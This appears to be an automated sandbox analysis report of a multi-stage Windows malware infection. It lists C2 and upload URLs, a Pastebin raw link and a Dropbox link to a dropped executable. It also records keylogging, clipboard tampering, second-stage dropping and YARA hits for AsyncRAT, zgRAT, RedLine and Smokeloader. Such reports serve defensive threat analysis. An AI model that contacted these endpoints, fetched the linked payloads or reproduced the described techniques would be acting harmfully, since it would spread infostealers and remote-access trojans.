Source: 3546345.exe, 00000025.00000002.4775255269.0000000002380000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/
Source: 3546345.exe, 00000025.00000002.4763090277.0000000001155000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/#F
Source: 3546345.exe, 00000025.00000002.4775255269.0000000002380000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/)
Source: 3546345.exe, 00000025.00000002.4763090277.0000000001155000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/1F
Source: 3546345.exe, 00000025.00000002.4775255269.0000000002380000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/2
Source: 3546345.exe, 00000025.00000002.4763090277.0000000001155000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/:F
Source: 3546345.exe, 00000025.00000002.4763090277.0000000001155000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/DG
Source: 3546345.exe, 00000025.00000002.4775255269.0000000002380000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/E
Source: 3546345.exe, 00000025.00000002.4775940501.0000000002441000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/F
Source: 3546345.exe, 00000025.00000002.4775255269.0000000002380000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/N
Source: 3546345.exe, 00000025.00000002.4763090277.0000000001155000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/RG
Source: 3546345.exe, 00000025.00000002.4775255269.0000000002380000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/S
Source: 3546345.exe, 00000025.00000002.4775255269.0000000002380000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/a
Source: 3546345.exe, 00000025.00000002.4775255269.0000000002380000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/g
Source: 3546345.exe, 00000025.00000002.4763090277.0000000001155000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/iG
Source: 3546345.exe, 00000025.00000002.4775255269.0000000002380000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/j
Source: 3546345.exe, 00000025.00000002.4775255269.0000000002380000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/v
Source: 3546345.exe, 00000025.00000002.4763090277.0000000001155000.00000004.00000020.00020000.00000000.sdmp, 3546345.exe, 00000025.00000002.4775867809.00000000023FF000.00000004.00000020.00020000.00000000.sdmp, 3546345.exe, 00000025.00000002.4763090277.000000000112E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/v1/upload.php
Source: 3546345.exe, 00000025.00000002.4775867809.00000000023FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/v1/upload.php%qN
Source: 3546345.exe, 00000025.00000002.4775867809.00000000023FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/v1/upload.php/qH
Source: 3546345.exe, 00000025.00000002.4763090277.000000000112E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/v1/upload.php0
Source: 3546345.exe, 00000025.00000002.4774750155.0000000001280000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/v1/upload.php9
Source: 3546345.exe, 00000025.00000002.4763090277.0000000001155000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/v1/upload.phpBJ
Source: 3546345.exe, 00000025.00000002.4774750155.0000000001280000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/v1/upload.phpG
Source: 3546345.exe, 00000025.00000002.4775867809.00000000023FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/v1/upload.phpIq
Source: 3546345.exe, 00000025.00000002.4774750155.0000000001280000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/v1/upload.phpM?
Source: 3546345.exe, 00000025.00000002.4775867809.00000000023FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/v1/upload.phpOq(
Source: 3546345.exe, 00000025.00000002.4775867809.00000000023FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/v1/upload.phpQq:
Source: 3546345.exe, 00000025.00000002.4763090277.0000000001155000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/v1/upload.phpXJ
Source: 3546345.exe, 00000025.00000002.4774750155.0000000001280000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/v1/upload.phpj
Source: 3546345.exe, 00000025.00000002.4774750155.0000000001280000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/v1/upload.phpl
Source: 3546345.exe, 00000025.00000002.4763090277.0000000001155000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/v1/upload.phpsrJG
Source: 3546345.exe, 00000025.00000002.4775255269.0000000002380000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top/x
Source: 3546345.exe, 00000025.00000002.4774750155.0000000001280000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top:80/v1/upload.php
Source: 3546345.exe, 00000025.00000002.4774750155.0000000001280000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top:80/v1/upload.phposoft
Source: 3546345.exe, 00000025.00000002.4774750155.0000000001280000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://thizx13vt.top:80/v1/upload.phpraz
Source: Shipment.pif, 0000000B.00000000.2048576959.0000000000A19000.00000002.00000001.01000000.00000006.sdmp, Shipment.pif, 0000000B.00000003.2056731275.00000000046B2000.00000004.00000800.00020000.00000000.sdmp, GuardTrack.scr, 00000013.00000000.2074054599.0000000000679000.00000002.00000001.01000000.00000008.sdmp, GuardTrack.scr, 00000015.00000000.2161600759.0000000000679000.00000002.00000001.01000000.00000008.sdmp, Shipment.pif.1.dr, GuardTrack.scr.11.dr, Scottish.0.dr	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: GOLD.exe.11.dr, GOLD[1].exe.11.dr, crypteda[1].exe.11.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: GOLD.exe.11.dr, GOLD[1].exe.11.dr, crypteda[1].exe.11.dr	String found in binary or memory: http://www.entrust.net/rpa03
Source: meta.exe, 00000027.00000002.3873284492.00007FF617EB7000.00000002.00000001.01000000.00000013.sdmp, meta.exe, 00000027.00000002.3872094991.00007FF617E51000.00000004.00000001.01000000.00000013.sdmp, meta.exe, 00000027.00000002.3650886377.00000220BB800000.00000004.00001000.00020000.00000000.sdmp, meta.exe, 00000027.00000000.3447262254.00007FF617EB7000.00000002.00000001.01000000.00000013.sdmp, meta.exe, 00000027.00000002.3650886377.00000220BC200000.00000004.00001000.00020000.00000000.sdmp, meta.exe.11.dr, meta[1].exe.11.dr	String found in binary or memory: https://aka.ms/GlobalizationInvariantMode
Source: meta[1].exe.11.dr	String found in binary or memory: https://aka.ms/nativeaot-compatibilityY
Source: meta.exe, 00000027.00000002.3872094991.00007FF617E51000.00000004.00000001.01000000.00000013.sdmp	String found in binary or memory: https://aka.ms/nativeaot-compatibilityh
Source: meta.exe, 00000027.00000002.3873284492.00007FF617EB7000.00000002.00000001.01000000.00000013.sdmp, meta.exe, 00000027.00000002.3650886377.00000220BB800000.00000004.00001000.00020000.00000000.sdmp, meta.exe, 00000027.00000000.3447262254.00007FF617EB7000.00000002.00000001.01000000.00000013.sdmp, meta.exe, 00000027.00000002.3650886377.00000220BC200000.00000004.00001000.00020000.00000000.sdmp, meta.exe.11.dr, meta[1].exe.11.dr	String found in binary or memory: https://aka.ms/nativeaot-compatibilityy
Source: InstallUtil.exe, 00000032.00000002.3758938143.000000000333A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.s
Source: InstallUtil.exe, 00000032.00000002.3758938143.000000000333A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000033.00000002.3597562499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, WIDeqOfZq9.exe.51.dr	String found in binary or memory: https://api.ip.sb/ip
Source: winmsbt.exe, 00000021.00000002.4712142699.0000000003289000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://direct-link.net/1218649/browse-and-buy-cs2-skins
Source: winmsbt.exe, 00000021.00000002.4712142699.0000000003289000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://direct-link.net/1218649/windows-latest-updates
Source: InstallUtil.exe, 00000032.00000002.3758938143.00000000033CE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://discord.com/api/v9/users/
Source: winmsbt.exe, 00000021.00000002.4712142699.0000000003289000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcRYqOGCv-jevzMWu9XILkZeuC_BAi1BgW9cnKgQP1CVVw&s
Source: Cerker.exe, 0000001C.00000003.3509353341.0000000001219000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000002.4622434555.0000000000C6F000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000002.4622434555.0000000000C93000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000003.3445287126.0000000000C9D000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000003.3733155923.0000000000D15000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fusionflow-meta.net/
Source: Cerker.exe, 0000001C.00000003.3385926643.000000000121B000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000001C.00000003.3382418323.000000000121B000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000001C.00000003.3386987728.000000000121B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fusionflow-meta.net/1G
Source: Cerker.exe, 00000022.00000002.4622434555.0000000000C93000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000003.3445287126.0000000000C9D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fusionflow-meta.net/5
Source: Cerker.exe, 00000022.00000002.4622434555.0000000000C6F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fusionflow-meta.net/G
Source: Cerker.exe, 00000022.00000003.4041557300.0000000000D01000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000003.3733155923.0000000000D15000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000002.4622434555.0000000000D15000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fusionflow-meta.net/socket/?id=5DCF833859158E570DD9A3BCC4B61D98E7D449D8067545A1379CD9413F2CB
Source: Cerker.exe, 0000001C.00000002.4585160635.0000000000DAA000.00000004.00000010.00020000.00000000.sdmp, Cerker.exe, 0000001C.00000002.4613814551.0000000001198000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000001C.00000002.4613814551.0000000001215000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000001C.00000003.3509353341.0000000001219000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000002.4622434555.0000000000C6F000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000002.4605809813.0000000000AFA000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://fusionflow-meta.net:443/socket/
Source: Cerker.exe, 0000001C.00000002.4585160635.0000000000DAA000.00000004.00000010.00020000.00000000.sdmp, Cerker.exe, 00000022.00000002.4605809813.0000000000AFA000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://fusionflow-meta.net:443/socket/.)
Source: Cerker.exe, 00000022.00000002.4622434555.0000000000C6F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fusionflow-meta.net:443/socket/3422
Source: Cerker.exe, 0000001C.00000002.4613814551.0000000001198000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000001C.00000002.4613814551.0000000001215000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000001C.00000003.3509353341.0000000001219000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fusionflow-meta.net:443/socket/7345342
Source: Cerker.exe, 00000022.00000003.4041557300.0000000000D01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fusionflow-meta.net:443/socket/?id=5DCF833859158E570DD9A3BCC4B61D98E7D449D8067545A1379CD9413
Source: Cerker.exe, 00000022.00000002.4622434555.0000000000C6F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fusionflow-meta.net:443/socket/se
Source: winmsbt.exe, 00000021.00000002.4712142699.0000000003234000.00000004.00000800.00020000.00000000.sdmp, winmsbt.exe, 00000021.00000002.4712142699.00000000031DF000.00000004.00000800.00020000.00000000.sdmp, winmsbt.exe, 00000021.00000002.4712142699.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, winmsbt.exe, 00000021.00000002.4712142699.000000000325F000.00000004.00000800.00020000.00000000.sdmp, winmsbt.exe, 00000021.00000002.4712142699.000000000331B000.00000004.00000800.00020000.00000000.sdmp, winmsbt.exe, 00000021.00000002.4712142699.0000000003346000.00000004.00000800.00020000.00000000.sdmp, winmsbt.exe, 00000021.00000002.4712142699.000000000320A000.00000004.00000800.00020000.00000000.sdmp, winmsbt.exe, 00000021.00000002.4712142699.00000000032B3000.00000004.00000800.00020000.00000000.sdmp, winmsbt.exe, 00000021.00000002.4712142699.00000000030F3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com
Source: winmsbt.exe, 00000021.00000002.4712142699.0000000003031000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/fiLr6dSt
Source: 3546345.exe, 00000025.00000000.3386144333.00000000005AD000.00000002.00000001.01000000.00000010.sdmp, 3546345[1].exe.11.dr, channel2[1].exe.11.dr, 3546345.exe.11.dr, Channel1[1].exe.11.dr	String found in binary or memory: https://update-ledger.net/update
Source: Shipment.pif, 0000000B.00000003.2056731275.00000000046B2000.00000004.00000800.00020000.00000000.sdmp, Shipment.pif.1.dr, GuardTrack.scr.11.dr, Scottish.0.dr	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: Cerker.exe, 0000001C.00000003.3509353341.0000000001219000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000002.4622434555.0000000000C6F000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000003.3445287126.0000000000CF5000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000002.4622434555.0000000000C93000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000003.3445287126.0000000000C9D000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000003.3429372925.0000000000CF7000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000002.4622434555.0000000000D01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/
Source: Cerker.exe, 00000022.00000003.3445287126.0000000000C9D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/(e
Source: Cerker.exe, 0000001C.00000003.4059843797.0000000001215000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/K
Source: Cerker.exe, 00000022.00000002.4622434555.0000000000C93000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000003.3445287126.0000000000C9D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/Pe
Source: Cerker.exe, 0000001C.00000002.4613814551.0000000001198000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/S
Source: Cerker.exe, 00000022.00000003.3445287126.0000000000C9D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/he
Source: Cerker.exe, 0000001C.00000002.4613814551.0000000001215000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/r
Source: Cerker.exe, 0000001C.00000002.4613814551.0000000001215000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/rs
Source: Cerker.exe, 00000022.00000003.3445287126.0000000000C9D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/scl/fi/rqsnrl6msilfirz1qp1pn/weetwegsdg.exe?rlkey=rmj9i20g87wwdvd6wsdaypie2&
Source: GOLD.exe.11.dr, GOLD[1].exe.11.dr, crypteda[1].exe.11.dr	String found in binary or memory: https://www.entrust.net/rpa0
Source: Scottish.0.dr	String found in binary or memory: https://www.globalsign.com/repository/0
Source: Shipment.pif, 0000000B.00000003.2056731275.00000000046B2000.00000004.00000800.00020000.00000000.sdmp, Shipment.pif.1.dr, GuardTrack.scr.11.dr, Scottish.0.dr	String found in binary or memory: https://www.globalsign.com/repository/06

Contains functionality for read data from the clipboard

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr

19_2_00624632

Contains functionality to modify clipboard data

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr

Code function: 19_2_00624830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

19_2_00624830

Contains functionality to read the clipboard data

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr

19_2_00624632

Contains functionality to retrieve information about pressed keystrokes

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr

19_2_00610508

Installs a raw input device (often for capturing keystrokes)

Source: InstallUtil.exe, 00000032.00000002.3758938143.00000000034C7000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: GetRawInputData

memstr_f3a5e7a4-8

Potential key logger detected (key state polling based)

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr

19_2_0063D164

Drops certificate files (DER)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Temp\Tmp1486.tmp			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Temp\Tmp14D5.tmp			Jump to dropped file

Spam, unwanted Advertisements and Ransom Demands

Writes many files with high entropy

Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	File created: C:\Users\user\AppData\Local\Temp\Entrepreneurs entropy: 7.99797398135	Jump to dropped file
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	File created: C:\Users\user\AppData\Local\Temp\Greatest entropy: 7.99794017652	Jump to dropped file
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	File created: C:\Users\user\AppData\Local\Temp\Provides entropy: 7.99760816884	Jump to dropped file
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	File created: C:\Users\user\AppData\Local\Temp\Competent entropy: 7.99811049854	Jump to dropped file
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	File created: C:\Users\user\AppData\Local\Temp\Whom entropy: 7.99734780297	Jump to dropped file
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	File created: C:\Users\user\AppData\Local\Temp\Reveal entropy: 7.99789640851	Jump to dropped file
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	File created: C:\Users\user\AppData\Local\Temp\Corporate entropy: 7.99704915594	Jump to dropped file
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	File created: C:\Users\user\AppData\Local\Temp\Screw entropy: 7.99717752647	Jump to dropped file
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	File created: C:\Users\user\AppData\Local\Temp\Still entropy: 7.9977069634	Jump to dropped file
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	File created: C:\Users\user\AppData\Local\Temp\Wireless entropy: 7.9965436862	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\591950\E entropy: 7.99975204156	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\crypteda[1].exe entropy: 7.99818162851	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	File created: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe entropy: 7.99818162851	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	File created: C:\Users\user\AppData\Local\TrackGuard Technologies\z entropy: 7.99975204156	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	File created: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe entropy: 7.99821613014	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	File created: C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe entropy: 7.99821613014	Jump to dropped file

System Summary

Malicious sample detected (through community Yara rule)

Source: 42.2.IIZS2TRqf69aZbLAX3cf3edn.exe.12df1a78.1.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 51.2.RegAsm.exe.482060.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 42.2.IIZS2TRqf69aZbLAX3cf3edn.exe.12df1a78.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 42.0.IIZS2TRqf69aZbLAX3cf3edn.exe.bf0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 51.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 51.2.RegAsm.exe.482060.0.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 0000001F.00000002.4168709454.0000000002A0F000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000002A.00000002.4703878971.0000000012DF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000001F.00000002.4175235264.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000002A.00000000.3476472138.0000000000BF2000.00000002.00000001.01000000.00000014.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe, type: DROPPED	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\D0nMCdvUeB.exe, type: DROPPED	Matched rule: Detects zgRAT Author: ditekSHen
Source: C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe, type: DROPPED	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\Windows.exe, type: DROPPED	Matched rule: Detects AsyncRAT Author: ditekSHen

.NET source code contains very large array initializations

Source: GOLD[1].exe.11.dr, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 311296
Source: GOLD.exe.11.dr, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 311296

PE file contains section with special chars

Source: random[1].exe.11.dr	Static PE information: section name:
Source: random[1].exe.11.dr	Static PE information: section name: .idata
Source: random[1].exe.11.dr	Static PE information: section name:
Source: 36f677264b.exe.11.dr	Static PE information: section name:
Source: 36f677264b.exe.11.dr	Static PE information: section name: .idata
Source: 36f677264b.exe.11.dr	Static PE information: section name:

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Wscript called in batch mode (surpress errors)

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js"

Abnormal high CPU Usage

Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif

Process Stats: CPU usage > 49%

Contains functionality to call native functions

Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe

Code function: 31_2_004205E7 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers,

31_2_004205E7

Contains functionality to communicate with device drivers

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr

Code function: 19_2_00614254: CreateFileW,DeviceIoControl,CloseHandle,

19_2_00614254

Contains functionality to launch a process as a different user

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr

19_2_00608F2E

Contains functionality to shutdown / reboot the system

Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Code function: 0_2_00403899 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,		0_2_00403899
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_00615778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		19_2_00615778

Creates files inside the system directory

Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	File created: C:\Windows\ProjectionAcademy	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	File created: C:\Windows\ChipSeems	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	File created: C:\Windows\LaboratoriesFriend	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	File created: C:\Windows\ConditionSuperintendent	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	File created: C:\Windows\AyePercent	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	File created: C:\Windows\CuDefense	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	File created: C:\Windows\Tasks\Hkbsse.job

Detected potential crypto function

Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Code function: 0_2_00407577	0_2_00407577
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005BB020	19_2_005BB020
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005B94E0	19_2_005B94E0
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005B9C80	19_2_005B9C80
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005D23F5	19_2_005D23F5
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_00638400	19_2_00638400
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005E6502	19_2_005E6502
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005E265E	19_2_005E265E
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005BE6F0	19_2_005BE6F0
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005D282A	19_2_005D282A
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005E89BF	19_2_005E89BF
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005E6A74	19_2_005E6A74
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_00630A3A	19_2_00630A3A
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005C0BE0	19_2_005C0BE0
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005DCD51	19_2_005DCD51
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_0060EDB2	19_2_0060EDB2
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_00618E44	19_2_00618E44
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_00630EB7	19_2_00630EB7
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005E6FE6	19_2_005E6FE6
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005D33B7	19_2_005D33B7
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005CD45D	19_2_005CD45D
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005DF409	19_2_005DF409
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005B1663	19_2_005B1663
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005CF628	19_2_005CF628
